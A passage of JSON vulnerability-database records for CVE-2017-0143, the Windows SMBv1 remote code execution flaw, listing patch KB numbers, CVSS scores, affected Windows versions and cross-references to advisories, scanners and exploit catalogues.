"SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": 
["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-11T22:53:48", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-11T22:53:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB4013198", "KB3177186", "KB4013429", "KB3210721", "KB4012606", "KBMS16-110, 3187754", "KB4012214", "KB4012212", "KB3213986", "KB3205401", "KB4012213", "KB3212646", "KB3210720", "KB4012215", "KB4012217", "KB3205409", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": 
"KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": 
"KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", 
"kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit 
systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T04:44:31", "differentElements": ["msAffectedSoftware"], "edition": 37}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-12T06:51:00", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", 
"RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012606", "KB4013429", "KB4012212", "KB4012598", "KB4012213", "KB4012215", "KB3210721", "KB3205401", "KB4012216", "KB3212646", "KB3210720", "KB3213986", "KB4013198", "KBMS16-110, 3187754", "KB4012214", "KB3177186", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T06:51:00", "differentElements": ["msAffectedSoftware"], "edition": 38}, {"bulletin": {"id": 
"MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": 